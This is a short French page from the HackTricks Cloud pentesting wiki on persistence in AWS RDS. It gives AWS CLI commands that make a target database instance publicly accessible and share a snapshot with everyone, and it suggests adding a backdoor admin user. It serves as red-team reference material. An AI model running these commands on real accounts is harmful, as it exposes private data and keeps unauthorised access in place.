Français - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

AWS - RDS Persistence

Apprenez le piratage AWS de zéro à héros avec htARTE (Expert Red Team AWS de HackTricks)!

Autres façons de soutenir HackTricks:

RDS

Pour plus d'informations, consultez :

pageAWS - Relational Database (RDS) Enum

Rendre l'instance accessible publiquement : rds:ModifyDBInstance

Un attaquant avec cette autorisation peut modifier une instance RDS existante pour activer l'accessibilité publique.

aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately

Créer un utilisateur administrateur dans la base de données

Un attaquant pourrait simplement créer un utilisateur dans la base de données afin que même si le mot de passe de l'utilisateur principal est modifié, il ne perde pas l'accès à la base de données.

Rendre le snapshot public

aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
Apprenez le piratage AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!

D'autres façons de soutenir HackTricks :

PrécédentAWS - Lightsail PersistenceSuivantAWS - S3 Persistence

Dernière mise à jour